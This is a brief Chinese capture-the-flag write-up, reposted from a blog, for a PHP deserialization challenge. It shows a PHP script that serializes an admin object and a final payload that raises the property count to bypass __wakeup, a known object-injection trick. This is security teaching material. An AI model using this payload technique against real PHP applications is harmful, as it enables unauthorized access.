[极客大挑战 2019]PHP
访问www.zip拿到源码.
绕过这三处.
构造exp
<?php
class Name{
private $username = 'admin';
private $password = '100';
}
$select = new Name();
$res=serialize(@$select);
echo $res
?>
O:4:"Name":2:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}
这里由于我们要绕过
function __wakeup(){
$this->username = 'guest';
}
知识点:
当成员属性数目大于实际数目时才可绕过wakeup
所以我们把2改成3
O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}
原文地址:https://blog.csdn.net/alwtj/article/details/144097505
免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!